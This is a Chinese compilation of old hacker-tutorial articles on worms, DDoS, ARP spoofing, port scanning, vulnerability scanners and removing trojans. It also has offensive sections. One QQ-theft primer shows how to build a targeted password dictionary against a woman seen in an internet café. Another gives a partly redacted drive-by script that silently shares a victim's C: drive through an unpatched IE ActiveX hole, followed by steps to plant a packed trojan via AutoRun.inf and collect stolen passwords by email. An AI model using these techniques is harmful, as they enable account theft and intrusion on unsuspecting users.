答：它的编写者是美国康乃尔大学一年级研究生罗特·莫里斯。这个程序只有99行，利用了Unix系统中的缺点，用Finger命令查联机用户名单，然后破译用户口令，用Mail系统复制、传播本身的源程序，再编译生成代码。
最初的网络蠕虫设计目的是当网络空闲时，程序就在计算机间“游荡”而不带来任何损害。当有机器负荷过重时，该程序可以从空闲计算机“借取资源”而达到网络的负载平衡。而莫里斯蠕虫不是“借取资源”，而是“耗尽所有资源”。

问：什么是DDoS？它会导致什么后果？

答：DDoS也就是分布式拒绝服务攻击。它使用与普通的拒绝服务攻击同样的方法，但是发起攻击的源是多个。通常攻击者使用下载的工具渗透无保护的主机，当获得该主机的适当的访问权限后，攻击者在主机中安装软件的服务或进程（以下简称代理）。这些代理保持睡眠状态，直到从它们的主控端得到指令，对指定的目标发起拒绝服务攻击。随着危害力极强的黑客工具的广泛传播使用，分布式拒绝服务攻击可以同时对一个目标发起几千个攻击。单个的拒绝服务攻击的威力也许对带宽较宽的站点没有影响，而分布于全球的几千个攻击将会产生致命的后果。

问：局域网内部的ARP攻击是指什么？

答：ARP协议的基本功能就是通过目标设备的IP地址，查询目标设备的MAC地址，以保证通信的进行。
基于ARP协议的这一工作特性，黑客向对方计算机不断发送有欺诈性质的ARP数据包，数据包内包含有与当前设备重复的Mac地址，使对方在回应报文时，由于简单的地址重复错误而导致不能进行正常的网络通信。一般情况下，受到ARP攻击的计算机会出现两种现象:
1.不断弹出“本机的XXX段硬件地址与网络中的XXX段地址冲突”的对话框。
2.计算机不能正常上网，出现网络中断的症状。
因为这种攻击是利用ARP请求报文进行“欺骗”的，所以防火墙会误以为是正常的请求数据包，不予拦截。因此普通的防火墙很难抵挡这种攻击。

问：什么叫欺骗攻击?它有哪些攻击方式？

答：网络欺骗的技术主要有:HONEYPOT和分布式HONEYPOT、欺骗空间技术等。主要方式有:IP欺骗、ARP欺骗、DNS欺骗、Web欺骗、电子邮件欺骗、源路由欺骗（通过指定路由，以假冒身份与其他主机进行合法通信或发送假报文，使受攻击主机出现错误动作）、地址欺骗（包括伪造源地址和伪造中间站点）等。

========================================================
菜鸟黑客入门攻击及防范技巧

在正式进行各种“黑客行为”之前，黑客会采取各种手段，探测（也可以说“侦察”）对方的主机信息，以便决定使用何种最有效的方法达到自己的目的。来看看黑客是如何获知最基本的网络信息——对方的IP地址；以及用户如何防范自己的IP泄漏。

■ 获取IP

“IP”作为Net用户的重要标示，是黑客首先需要了解的。获取的方法较多，黑客也会因不同的网络情况采取不同的方法，如：在局域网内使用Ping指令，Ping对方在网络中的名称而获得IP；在Internet上使用IP版的QQ直接显示。而最“牛”，也是最有效的办法是截获并分析对方的网络数据包。如图1所示，这是用Windows 2003的网络监视器捕获的网络数据包，可能一般的用户比较难看懂这些16进制的代码，而对于了解网络知识的黑客，他们可以找到并直接通过软件解析截获后的数据包的IP包头信息，再根据这些信息了解具体的IP。


■ 隐藏IP

虽然侦察IP的方法多样，但用户可以隐藏IP的方法同样多样。就拿对付最有效的“数据包分析方法”而言，就可以安装能够自动去掉发送数据包包头IP信息的“Norton Internet Security 2003”。不过使用“Norton Internet Security”有些缺点，譬如：它耗费资源严重，降低计算机性能；在访问一些论坛或者网站时会受影响；不适合网吧用户使用等等。现在的个人用户采用最普及隐藏IP的方法应该是使用代理，由于使用代理服务器后，“转址服务”会对发送出去的数据包有所修改，致使“数据包分析”的方法失效。一些容易泄漏用户IP的网络软件（QQ、MSN、IE等）都支持使用代理方式连接Internet，特别是QQ使用“ezProxy”等代理软件连接后，IP版的QQ都无法显示该IP地址。这里笔者介绍一款比较适合个人用户的简易代理软件——网络新手IP隐藏器（如图2），只要在“代理服务器”和“代理服务器端”填入正确的代理服务器地址和端口，即可对http使用代理，比较适合由于IE和QQ泄漏IP的情况。

不过使用代理服务器，同样有一些缺点，如：会影响网络通讯的速度；需要网络上的一台能够提供代理能力的计算机，如果用户无法找到这样的代理服务器就不能使用代理（查找代理服务器时，可以使用“代理猎手”等工具软件扫描网络上的代理服务器）。

虽然代理可以有效地隐藏用户IP，但高深的黑客亦可以绕过代理，查找到对方的真实IP地址，用户在何种情况下使用何种方法隐藏IP，也要因情况而论。


黑客的探测方式里除了侦察IP，还有一项——端口扫描。通过“端口扫描”可以知道被扫描的计算机哪些服务、端口是打开而没有被使用的（可以理解为寻找通往计算机的通道）。

一、端口扫描

网上很容易找到远程端口扫描的工具，如Superscan、IP Scanner、Fluxay（流光）等(如图1)，这就是用“流光”对试验主机192.168.1.8进行端口扫描后的结果。从中我们可以清楚地了解，该主机的哪些非常用端口是打开的；是否支持FTP、Web服务；且FTP服务是否支持“匿名”，以及IIS版本，是否有可以被成功攻破的IIS漏洞也显示出来。


二、阻止端口扫描
防范端口扫描的方法有两个：
1． 关闭闲置和有潜在危险的端口

这个方法有些“死板”，它的本质是——将所有用户需要用到的正常计算机端口外的其他端口都关闭掉。因为就黑客而言，所有的端口都可能成为攻击的目标。换句话说“计算机的所有对外通讯的端口都存在潜在的危险”，而一些系统必要的通讯端口，如访问网页需要的HTTP（80端口）；QQ（4000端口）等不能被关闭。

在Windows NT核心系统（Windows 2000/XP/ 2003）中要关闭掉一些闲置端口是比较方便的，可以采用“定向关闭指定服务的端口”和“只开放允许端口的方式”。计算机的一些网络服务会有系统分配默认的端口，将一些闲置的服务关闭掉，其对应的端口也会被关闭了（如图2）。进入“控制面板”、“管理工具”、“服务”项内，关闭掉计算机的一些没有使用的服务（如FTP服务、DNS服务、IIS Admin服务等等），它们对应的端口也被停用了。至于“只开放允许端口的方式”，可以利用系统的“TCP/IP筛选”功能实现，设置的时候，“只允许”系统的一些基本网络通讯需要的端口即可（关于“TCP/IP的筛选”，请参看本期应用专题）。


2． 检查各端口，有端口扫描的症状时，立即屏蔽该端口

这种预防端口扫描的方式显然用户自己手工是不可能完成的，或者说完成起来相当困难，需要借助软件。这些软件就是我们常用的网络防火墙。

防火墙的工作原理是：首先检查每个到达你的电脑的数据包，在这个包被你机上运行的任何软件看到之前，防火墙有完全的否决权，可以禁止你的电脑接收Internet上的任何东西。当第一个请求建立连接的包被你的电脑回应后，一个“TCP/IP端口”被打开；端口扫描时，对方计算机不断和本地计算机建立连接，并逐渐打开各个服务所对应的“TCP/IP端口”及闲置端口，防火墙经过自带的拦截规则判断，就能够知道对方是否正进行端口扫描，并拦截掉对方发送过来的所有扫描需要的数据包。

现在市面上几乎所有网络防火墙都能够抵御端口扫描，在默认安装后，应该检查一些防火墙所拦截的端口扫描规则是否被选中，否则它会放行端口扫描，而只是在日志中留下信息而已。

黑客在进行攻击前的准备工作，就此介绍完毕。在以后的内容中，将转入正式的入侵、窃取和攻击等具体的介绍。

上网了吧，用Q了吧，被盗了吧，正常。想上网吧，想用Q吧，不想被盗Q吧，正常。那就来了解一些盗QQ方面的知识吧！

一、名词解释

1.字典

所谓字典，其实就是一个包含有许多密码的文本文件。字典的生成有两种方式：用字典软件生成和手动添加。一般字典软件能生成包含生日、电话号码、常用英文名等密码的字典，不过由于这样生成的字典体积大，而且不灵活，所以黑客往往会手动添加一些密码到字典里去，形成一个“智能化”的密码文件。

2.暴力破解

所谓暴力破解，其实就是用无数的密码来与登录QQ的密码进行核对，直到相同为止。暴力破解这种方法不仅可以运用在盗QQ上，在破解其它密码时也常用这种方法，如：破解系统管理员密码等。这是最常用的一种破解方式。

二、原理分析

现在盗QQ的软件有两种，本地破解和远程破解。看起来好像挺神秘的，其实说穿了就那么回事。下面咱们先来看看本地破解。

1.本地破解

本地破解其实就是用软件选择一个在本地登录过的QQ号码，然后挂上字典进行密码核对。本地破解也可分为两种：暴力破解和本地记录。而暴力破解又分为两种：按顺序增加和通过字典对比。比如现在我要破解QQ号为123456的密码，我可以用1作为密码进行核对，如果正确就可以盗走该号了，如果不正确，则用2来核对，还不正确，则用3，以此顺序增加，直到和密码相同为止。不过这样的破解效率是很低的，因为许多人的密码并不只是数字，所以这种方法并不常见。

平时常用的是通过对比字典中密码的方法，如果正确就盗走QQ。因为字典可以做得很“智能化”，所以这种破解效率相对较高，特别是当你的密码是简单的数字，或是数字加一些英文名时特别明显。举个例子，比如我在网吧看到一MM的英文名为alice，密码位数为8位（我怎么知道的？晕！偷看到的嘛！）。从常理来讲，一般她的密码就是alice加上一些数字。于是我可以用易优超级字典生成器制作这样一个字典：把alice做为特殊字符排在密码的第1-5位（如图1），然后把基本字符里的数字全部选上，再将密码位数设为8，然后选好保存位置点“生成字典”。


图1

打开生成的字典，你就可以看到alice000、alice001等密码了（如图2）。然后就是把alice放在第2-6位，第3-7位，第4-8位，其它位置同样用数字填满。接下来我只要用软件把这些字典挂上进行破解，很快就可以得到QQ密码了。



===============================================
黑客通过网页窃取QQ方法

要想偷别人的QQ，方法有很多了。利用恶意网页使对方的电脑被共享出来是很有趣的一招。方法是：在你的网站网页中加入如下内容的代码：

------------------------------------------------------------------------

＜script language=Java Script＞
document.write("＜APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent＞＜/APPLET＞");
function f()
{*********************];
al.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
al.createlnstance()
Shl=al.GetObject() Shl.RegWrite("HKLM//Software//Microsoft//Windows//CurrentVersion//Network//LanMan//RWC$//Flafgs",302,"REG_DWORD");
Shl.RegWrite("HKLM//Software//Microsoft//Windows//CurrentVersion//Network//LanMan//RWC$//Type",0,"REG_DWORD");
Shl.RegWrite("HKLM//Software//Microsoft//Windows//CurrentVersion//Network//LanMan//RWC$//Path","C://");}
function init()
{setTimeout("f()",1000);}
{********************}
init()
＜/script＞
-------------------------------------

上面的代码大家一定很容易读懂，简单说来就是通过修改对方注册表中的键值，把对方的C盘共享出来，如果想让对方的其他盘都共享请自行设置。

述代码中{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}代表Windows Scripting Host(WSH)的外壳对象。WSH是微软提供的一种基于32位Windows平台的、与语言无关的脚本解释机制，它使得脚本能够直接在Windows桌面或命令提示符下运行。WSH使得脚本可以被执行，就象执行批处理一样。以“Shl.RegWrite”开头的这几句代码的作用是写入浏览者的注册表，就是它们使得对方的硬盘被共享的。把“Flags”的键值设为00000302可以隐藏共享，使对方无法发现，非常隐蔽。

网页做好后，把它上传你的主页空间，骗他浏览你的网页（就看你的嘴皮子功夫了），如果对方的IE没有打补丁（网上这样的电脑有很多），就可以把他的C盘共享出来。整个方法的原理就是把com.ms.activeX.ActiveXComponent对象嵌入＜APPLET＞标记中，这样会导致任意创建和解释执行ActiveX对象，使我们可以创建任意文件、运行程序、写注册表。未打补丁的IE，在打开含有上述代码的网页时不会有任何警告，我们就是利用这个漏洞把对方的硬盘被共享出来。

等对方中招后，就把对方的硬盘映射过来，可以使用net use命令，也可以使用网络刺客II等软件。下一步可以给对方植入一个盗QQ的软件，比方说QQ杀手等，注意一定要用ASPack或其他加壳软件给木马加壳（其实就是另类“压缩”），防止杀毒软件发现。

最后，打开记事本键入以下内容：
[AutoRun]
open=winnt32.exe

保存为AutoRun.inf，其中的winnt32.exe为木马文件。把AutoRun.inf和winnt32.exe一起拷到对方某分区的根目录下。这样，只要他双击该分区就会中木马！这样可以大大的增加木马运行的主动性！须知许多人现在都非常警惕，不熟悉的文件他们轻易的不会运行，而这种方法就很难防范了。

以后，你就等着用邮箱收信收对方的QQ密码吧。

注意，本文只是技术交流，大家不要随意盗取别人的QQ。同时为了保障安全我们没有完全刊登源代码。敬请原谅！

===================================

选择漏洞扫描工具

对于一个复杂的多层结构的系统和网络安全规划来说，隐患扫描是一项重要的组成元素。隐患扫描能够模拟黑客的行为，对系统设置进行攻击测试，以帮助管理员在黑客攻击之前，找出网络中存在的 漏洞。这样的工具可以远程评估你的网络的安全级别，并生成评估报告，提供相应的整改措施。

目前，市场上有很多隐患扫描工具，按照不同的技术（基于网络的、基于主机的、基于代理的、C/S的）、不同的特征、不同的报告方法，以及不同的监听模式，可以分成好几类。不同的产品之间，漏洞检测的准确性差别较大，这就决定了生成的报告的有效性上也有很大区别。

选择正确的隐患扫描工具，对于提高你的系统的安全性，非常重要。

1、漏洞扫描概述

在字典中，Vulnerability意思是漏洞或者缺乏足够的防护。在军事术语中，这个词的意思更为明确，也更为严重------有受攻击的嫌疑。

每个系统都有漏洞，不论你在系统安全性上投入多少财力，攻击者仍然可以发现一些可利用的特征和配置缺陷。这对于安全管理员来说，实在是个不利的消息。但是，多数的攻击者，通常做的是简单的事情。发现一个已知的漏洞，远比发现一个未知漏洞要容易的多，这就意味着：多数攻击者所利用的都是常见的漏洞，这些漏洞，均有书面资料记载。

⑤ 生成的报告的特性（内容是否全面、是否可配置、是否可定制、报告的格式、输出方式等）；

⑥ 对于漏洞修复行为的分析和建议（是否只报告存在哪些问题、是否会告诉您应该如何修补这些漏洞）；

⑦ 安全性（由于有些扫描工具不仅仅只是发现漏洞，而且还进一步自动利用这些漏洞，扫描工具自身是否会带来安全风险）；

⑧ 性能；
⑨ 价格结构

这样的话，采用适当的工具，就能在黑客利用这些常见漏洞之前，查出网络的薄弱之处。如何快速简便地发现这些漏洞，这个非常重要。

漏洞，大体上分为两大类：
① 软件编写错误造成的漏洞；
② 软件配置不当造成的漏洞。

漏洞扫描工具均能检测以上两种类型的漏洞。漏洞扫描工具已经出现好多年了，安全管理员在使用这些工具的同时，黑客们也在利用这些工具来发现各种类型的系统和网络的漏洞。

入侵是重要的第一步。当您迈出了这一步后，接下来的是：如何选择满足您公司需要的合适的隐患扫描技术，这同样也很重要。以下列出了一系列衡量因素：

① 底层技术（比如，是被动扫描还是主动扫描，是基于主机扫描还是基于网络扫描）；
② 特性；
③ 漏洞库中的漏洞数量；
④ 易用性；

2.1 底层技术

比较漏洞扫描工具，第一是比较其底层技术。你需要的是主动扫描，还是被动扫描；是基于主机的扫描，还是基于网络的扫描，等等。一些扫描工具是基于Internet的，用来管理和集合的服务器程序，是运行在软件供应商的服务器上，而不是在客户自己的机器上。这种方式的优点在于检测方式能够保证经常更新，缺点在于需要依赖软件供应商的服务器来完成扫描工作。

扫描古城可以分为"被动"和"主动"两大类。被动扫描不会产生网络流量包，不会导致目标系统崩溃，被动扫描工具对正常的网络流量进行分析，可以设计成"永远在线"检测的方式。与主动扫描工具相比，被动扫描工具的工作方式，与网络监控器或IDS类似。

主动扫描工具更多地带有"入侵"的意图，可能会影响网络和目标系统的正常操作。他们并不是持续不断运行的，通常是隔一段时间检测一次。

基于主机的扫描工具需要在每台主机上安装代理（Agent）软件；而基于网络的扫描工具则不需要。基于网络的扫描工具因为要占用较多资源，一般需要一台专门的计算机。

如果网络环境中含有多种操作系统，您还需要看看扫描其是否兼容这些不同的操作系统（比如Microsoft、Unix以及Netware等）。

2.2 管理员所关心的一些特性

通常，漏洞扫描工具完成一下功能：扫描、生成报告、分析并提出建议，以及数据管理。在许多方面，扫描是最常见的功能，但是信息管理和扫描结果分析的准确性同样很重要。另外要考虑的一个方面是通知方式：当发现漏洞后，扫描工具是否会向管理员报警？采用什么方式报警？

对于漏洞扫描软件来说，管理员通常关系以下几个方面：

① 报表性能好；
② 易安装，易使用；
③ 能够检测出缺少哪些补丁；
④ 扫描性能好，具备快速修复漏洞的能力；
⑤ 对漏洞及漏洞等级检测的可*性；
⑥ 可扩展性；
⑦ 易升级性；
⑧ 性价比好；

2.3 漏洞库

只有漏洞库中存在相关信息，扫描工具才能检测到漏洞，因此，漏洞库的数量决定了扫描工具能够检测的范围。

然而，数量并不意味着一切，真正的检验标准在于扫描工具能否检测出最常见的漏洞？最根本的在于，扫描工具能否检测出影响您的系统的那些漏洞？扫描工具中有用的总量取决于你的网络设备和系统的类型。你使用扫描工具的目的是利用它来检测您的特定环境中的漏洞。如果你有很多Netware服务器，那么，不含Netware漏洞库的扫描工具就不是你的最佳选择。

当然，漏洞库中的攻击特性必须经常升级，这样才能检测到最近发现的安全漏洞。

2.4 易使用性

一个难以理解和使用的界面，会阻碍管理员使用这些工具，因此，界面友好性尤为重要。不同的扫描工具软件，界面也各式各样，从简单的基于文本的，到复杂的图形界面，以及Web界面。

2.5 扫描报告

对管理员来说，扫描报告的功能越来越重要，在一个面向文档的商务环境中，你不但要能够完成你的工作，而且还需要提供书面资料说明你是怎样完成的。事实上，一个扫描可能会得到几百甚至几千个结果，但是这些数据是没用的，除非经过整理，转换成可以为人们理解的信息。这就意味着理想情况下，扫描工具应该能够对这些数据进行分类和交*引用，可以导到其他程序中，或者转换成其他格式（比如CSV，HTML，XML，MHT，MDB，EXCEL以及Lotus等等），采用不同方式来展现它，并且能够很容易的与以前的扫描结果做比较。

漏洞，才完成一半工作。一个完整的方案，同时将告诉你针对这些漏洞将采取哪些措施。一个好的漏洞扫描工具会对扫描结果进行分析，并提供修复建议。一些扫描工具将这些修复建议整合在报告中，另外一些则提供产品网站或其它在线资源的链接。

漏洞修复工具，它可以和流行的扫描工具结合在一起使用，对扫描结果进行汇总，并自动完成修复过程。

2.7 分析的准确性

只有当报告的结果是精确的，提供的修复建议是有效的，一份包含了详细漏洞修复建议的报告， 才算是一份优秀的报告。一个好的扫描工具必须具有很低的误报率（报告出的漏洞实际上不存在）和漏报率（漏洞存在，但是没有检测到）。

2.8 安全问题

因扫描工具而造成的网络瘫痪所引起的经济损失，和真实攻击造成的损失是一样的，都非常巨大。一些扫描工具在发现漏洞后，会尝试进一步利用这些漏洞，这样能够确保这些漏洞是真实存在的，进而消除误报的可能性。但是，这种方式容易出现难以预料的情况。在使用具备这种功能的扫描工具的时候，需要格外小心，最好不要将其设置成自动运行状态。

扫描工具可能造成网络失效的另一种原因，是扫描过程中，超负荷的数据包流量造成拒绝服务（DOS，Denial Of Service）。为了防止这一点，需要选择好适当的扫描设置。相关的设置项有：并发的线程数、数据包间隔时间、扫描对象总数等，这些项应该能够调整，以便使网络的影响降到最低。一些扫描工具还提供了"安全扫描"的模板，以防止造成对目标系统的损耗。

2.9 性能

扫描工具运行的时候，将占用大量的网络带宽，因此，扫描过程应尽快完成。当然，漏洞库中的漏洞数越多，选择的扫描模式越复杂，扫描所耗时间就越长，因此，这只是个相对的数值。提高性能的一种方式，是在企业网中部署多个扫描工具，将扫描结果反馈到一个系统中，对扫描结果进行汇总。

3、隐患扫描工具的价格策略

商业化的扫描工具通常按以下几种方式来发布器授权许可证：按IP地址授权，按服务器授权，按管理员授权。不同的授权许可证方式有所区别。

3.1 按IP段授权

许多扫描其产品，比如eEye的Retina和ISS（Internet Security Scanner）要求企业用户按照IP段或IP范围来收费。换句话说，价格取决于所授权的可扫描的IP地址的数目。

3.2 按服务器授权


一些扫描工具供应商，按照每个服务器/每个工作站来计算器许可证的价格。服务器的授权价格会比工作站高很多，如果有多台服务器的话，扫描工具的价格会明显上升。

3.3 按管理员授权

对于大多数企业而言，这种授权方式，比较简单，性价比也较好。

4、总结

在现在的互联网环境中，威胁无处不在。为了防范攻击，第一件事就是在黑客发动攻击之前，发现网络和系统中的漏洞，并及时修复。

但是，漏洞扫描工具在特性、精确性、价格以及可用性上差别较大，如何选择一个正确的隐患扫描工具，尤为重要。


=====================================================

黑客及木马攻击常见端口的关闭

以下列出的端口仅为相关木马程序默认情况下开放的端口，请根据具体情况采取相应的操作：

707端口的关闭：

这个端口开放表示你可能感染了nachi蠕虫病毒，该蠕虫的清除方法如下：

1、停止服务名为WinS Client和Network Connections Sharing的两项服务

2、删除c:WinntSYSTEM32WinS目录下的DLLHOST.EXE和SVCHOST.EXE文件

3、编辑注册表，删除HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServices项中名为RpcTftpd和RpcPatch的两个键值

1999端口的关闭：

这个端口是木马程序BackDoor的默认服务端口，该木马清除方法如下：

1、使用进程管理工具将notpa.exe进程结束

2、删除c:Windows目录下的notpa.exe程序

3、编辑注册表，删除HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersion

Run项中包含c:Windows otpa.exe /o=yes的键值

2001端口的关闭：

这个端口是木马程序黑洞2001的默认服务端口，该木马清除方法如下：

1、首先使用进程管理软件将进程Windows.exe杀掉

2、删除c:Winntsystem32目录下的Windows.exe和S_Server.exe文件

3、编辑注册表，删除HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersion

RunServices项中名为Windows的键值

4、将HKEY_CLASSES_ROOT和HKEY_LOCAL_MACHINESoftwareCLASSES项中的Winvxd项删除

5、修改HKEY_CLASSES_ROOT xtfileshellopencommand项中的
c:Winntsystem32S_SERVER.EXE %1为C:WinNTNOTEPAD.EXE %1

6、修改HKEY_LOCAL_MACHINESoftwareCLASSES xtfileshellopencommand

项中的c:Winntsystem32S_SERVER.EXE %1键值改为 C:WinNTNOTEPAD.EXE %1

2023端口的关闭：

这个端口是木马程序Ripper的默认服务端口，该木马清除方法如下：

1、使用进程管理工具结束sysrunt.exe进程

2、删除c:Windows目录下的sysrunt.exe程序文件

3、编辑system.ini文件，将shell=explorer.exe sysrunt.exe 改为shell=explorer.exe后保存

4、重新启动系统

2583端口的关闭：

这个端口是木马程序Wincrash v2的默认服务端口，该木马清除方法如下：

1、编辑注册表，删除HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersion

Run项中的WinManager = "c:Windowsserver.exe"键值

2、编辑Win.ini文件，将run=c:Windowsserver.exe改为run=后保存退出

3、重新启动系统后删除C:Windowssystem SERVER.EXE

3389端口的关闭：

首先说明3389端口是Windows的远程管理终端所开的端口，它并不是一个木马程序，请先确定该服务是否是你自己开放的。如果不是必须的，请关闭该服务。

Win2000关闭的方法：

1、Win2000server 开始-->程序-->管理工具-->服务里找到Terminal Services服务项，选中属性选项将启动类型改成手动，并停止该服务。

2、Win2000pro开始-->设置-->控制面板-->管理工具-->服务里找到Terminal Services服务项，选中属性选项将启动类型改成手动，并停止该服务。

Winxp关闭的方法：

在我的电脑上点右键选属性-->远程，将里面的远程协助和远程桌面两个选项框里的勾去掉。

4444端口的关闭：

如果发现你的机器开放这个端口，可能表示你感染了msblast蠕虫，清除该蠕虫的方法如下：

1、使用进程管理工具结束msblast.exe的进程

2、编辑注册表，删除HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRun

项中的"Windows auto update"="msblast.exe"键值

3、删除c:Winntsystem32目录下的msblast.exe文件

4899端口的关闭：

首先说明4899端口是一个远程控制软件（remote administrator)服务端监听的端口，他不能算是一个木马程序，但是具有远程控制功能，通常杀毒软件是无法查出它来的，请先确定该服务是否是你自己开放并且是必需的。如果不是请关闭它。

关闭4899端口：

1、请在开始-->运行中输入cmd(98以下为command),然后 cd C:Winntsystem32(你的系统安装目录），输入r_server.exe /stop后按回车。

然后在输入r_server /uninstall /silence

2、到C:Winntsystem32(系统目录）下删除r_server.exe admdll.dll

raddrv.dll三个文件

5800，5900端口：

首先说明5800，5900端口是远程控制软件VNC的默认服务端口，但是VNC在修改过后会被用在某些蠕虫中。

请先确认VNC是否是你自己开放并且是必须的，如果不是请关闭

关闭的方法：

1、首先使用fport命令确定出监听在5800和5900